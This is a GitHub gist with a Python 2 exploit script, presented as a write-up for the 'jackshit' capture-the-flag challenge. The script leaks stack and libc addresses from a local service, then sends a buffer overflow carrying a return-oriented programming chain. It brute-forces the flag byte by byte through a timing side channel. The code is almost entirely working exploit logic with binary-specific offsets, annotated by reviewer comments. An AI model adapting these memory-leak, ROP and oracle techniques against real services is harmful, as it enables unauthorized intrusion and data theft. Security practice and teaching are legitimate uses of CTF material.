@otms61
Created July 4, 2015 16:27
write up for jackshit
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
from time import sleep
import signal
import string
def sock(remoteip, remoteport):
    """Open a TCP connection to ``(remoteip, remoteport)``.

    Returns a pair ``(socket, file)``: the connected socket and a
    read/write file object wrapping it. ``bufsize=0`` is the Python 2
    keyword for an unbuffered file, which is what read_until's one-byte
    reads rely on.
    """
    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((remoteip, remoteport))
    stream = conn.makefile('rw', bufsize=0)
    return conn, stream
def read_until(f, delim='\n'):
    """Read single characters from *f* until the text read ends with *delim*.

    Returns everything read, delimiter included. The check happens before
    each read, so an empty *delim* returns '' without touching *f*. If the
    delimiter never arrives this loops forever: ``f.read(1)`` returns ''
    at EOF and the ``endswith`` test never becomes true.
    """
    text = ''
    while True:
        if text.endswith(delim):
            return text
        text += f.read(1)
def p(a):
    """Pack integer *a* as a 4-byte little-endian unsigned value."""
    packer = struct.Struct("<I")
    return packer.pack(a)
def u(a):
    """Unpack 4 little-endian bytes *a* into an unsigned integer."""
    (value,) = struct.unpack("<I", a)
    return value
def shell(s):
    """Hand the already-connected socket *s* to a telnetlib session and
    give the terminal interactive control of it.

    Defined as a convenience helper; nothing else in this script calls it.
    """
    session = telnetlib.Telnet()
    session.sock = s
    session.interact()
# Offsets within the challenge's libc build. Each one is added to the
# libc_base derived from the leak below, so they are only meaningful for
# that exact libc binary.
libc_start_main_offset = 0x19990
libc_sleep_offset = 0xb5500
libc_jeax_offset = 0x0001a8f0
# 0x00094c23: add eax, edx ; ret
libc_add_eax_edx_offset = 0x00094c23
# 0x00001aa2: pop edx ; ret ; (15 found)
# NOTE(review): the address quoted in the comment above (0x1aa2) does not
# match the value assigned here (0x2e3cc); one of the two is stale.
libc_pop_edx_offset = 0x0002e3cc
# 0x0002f06c: xor eax, eax ; ret ;
libc_xor_eax_offset = 0x0002f06c  # resolved below but never used afterwards
# Fixed addresses in the challenge binary; they are used as absolute
# values later (no base is added). Only strcmp_plt, flag_bss and pop2ret
# are referenced again in this script; write_plt, write_got, ret, popret,
# pop3ret and pop4ret are left unused.
write_plt = 0x8048870
write_got = 0xb75ffc50
strcmp_plt = 0x80487b0
flag_bss = 0x0804B084
ret = 0x8048742
popret = 0x8048759
pop2ret = 0x8048ed7
pop3ret = 0x8048ed6
pop4ret = 0x8048ed5
# --- Leak phase ---------------------------------------------------------
# Python 2 code (print statements). A first connection is used only to
# obtain a dump of the service's stack, from which a stack address and
# the libc load base are derived. The menu inputs ('2', '3', '1+1000')
# and the marker strings are specific to this service.
s, f = sock('localhost', 1282)
s.send('2\n3\n')
s.send('1+1000\n')
read_until(f, 'got no game, dis all I got:\n')
stack_str = read_until(f, 'We\'ve')
# The dump is whitespace-separated hex tokens (presumably one byte each).
# Drop the trailing "We've" marker, group every 4 tokens, reverse each
# group (little-endian) and parse the group as one 32-bit word.
ss = stack_str[:-5].replace('\n', ' ').split()
stack = [int(''.join(ss[i:i+4][::-1]), 0x10) for i in range(0, len(ss), 4)]
# Word 10 is taken as a stack pointer; the constant 277 is the assumed
# distance back to where the submitted string sits (str_head is reused
# in game() below) -- both values are specific to this binary.
stack_addr = stack[10]
str_head = stack_addr - 277
# Word 71 is presumably a return address into __libc_start_main, 243 bytes
# past the symbol; subtracting that and the symbol's offset yields the
# libc base. The remaining libc_* values are then plain base + offset.
libc_base = stack[71]-243-libc_start_main_offset
libc_sleep = libc_base + libc_sleep_offset  # only printed, not used further
libc_jeax = libc_base + libc_jeax_offset
libc_add_eax_edx = libc_base + libc_add_eax_edx_offset
libc_pop_edx = libc_base + libc_pop_edx_offset
libc_xor_eax = libc_base + libc_xor_eax_offset  # computed but never used
print '[*] stack addr: {}'.format(hex(stack_addr))
print '[*] str head addr: {}'.format(hex(str_head))
print '[*] libc base: {}'.format(hex(libc_base))
print '[*] sleep: {}'.format(hex(libc_sleep))
print '[*] pop edx: {}'.format(hex(libc_pop_edx))
# Only the names are dropped; the socket is not closed explicitly and is
# left to be closed when CPython collects it.
del s, f
TIMEOUT = 1  # seconds; passed to signal.alarm() in game() before the final read
class TimeoutError(Exception):
    """Raised by alrarm_handler when the SIGALRM set in game() fires.

    In Python 3 this name shadows the builtin ``TimeoutError``; the script
    is Python 2 code, where no such builtin exists.
    """
def alrarm_handler(signum, frame):
    """SIGALRM handler installed by game(); turns the alarm into a
    TimeoutError so the blocking ``f.read()`` there is interrupted.

    *signum* and *frame* are the standard handler arguments and are not
    inspected. (The name keeps the original spelling because game()
    references it.)
    """
    raise TimeoutError
def game(idx, flag):
    # Oracle for one guess. Opens a fresh connection, drives the service
    # through its menu to the point where the long input is accepted,
    # sends it, and then reports how the final read ended: True if it was
    # cut short by the alarm (the caller treats that as "the guess at
    # position idx was right"), False if the socket errored. The menu
    # choices ('2', '3', '4', '5', '0') and every address used here are
    # specific to this challenge binary.
    s, f = sock('localhost', 1282)
    def jack():
        # Repeats the '2\n3\n' interaction until the reported balance is
        # above 199. Presumably a precondition the service enforces before
        # option 4 accepts the input -- not visible from this script.
        n = 0
        while n <= 199:
            s.send('2\n3\n')
            read_until(f, 'You\'ve got $')
            read_until(f, 'You\'ve got $')
            money = read_until(f).strip()
            n = int(money)
    jack()
    s.send('4\n')
    # Input string: 44 bytes of filler, then the chain of addresses taken
    # from the constants above and the leaked libc/stack values, then the
    # candidate flag prefix terminated by a NUL byte.
    payload = ''
    payload += 'a'*44
    payload += p(strcmp_plt)
    payload += p(pop2ret)
    payload += p(flag_bss+idx)
    payload += p(str_head + 44 + 4*8 - 3)
    payload += p(libc_pop_edx)
    payload += p(libc_jeax)
    payload += p(libc_add_eax_edx)
    payload += p(libc_jeax)
    payload += flag + '\x00'
    s.send(payload+'\n')
    # After TIMEOUT seconds SIGALRM raises TimeoutError out of f.read().
    signal.signal(signal.SIGALRM, alrarm_handler)
    signal.alarm(TIMEOUT)
    try:
        s.send('5\n')
        s.send('0\n')
        f.read()
    except TimeoutError:
        return True
    except socket.error:
        signal.alarm(0)
        return False
    # NOTE(review): if f.read() returns normally (peer closed the
    # connection cleanly) the function falls through and returns None, and
    # the pending alarm is never cancelled, so it can fire later in the
    # caller. The socket is also never closed explicitly.
# --- Recovery loop --------------------------------------------------------
# Rebuilds the flag one character at a time, from position 50 backwards to
# 0, prepending each confirmed character. Candidates are NUL and newline
# first, then string.printable; each candidate costs one full game() round
# trip. If no candidate is accepted for a position the loop silently moves
# on to the next idx with the flag unchanged.
flag = ''
for idx in range(50, -1, -1):
    for c in '\x00\n' + string.printable:
        print c
        if game(idx, c+flag):
            flag = c + flag
            # NOTE(review): the label reads 'idx' but the first value
            # formatted is c (the character), not idx.
            print 'idx: {}, flag: {} '.format(c, flag)
            break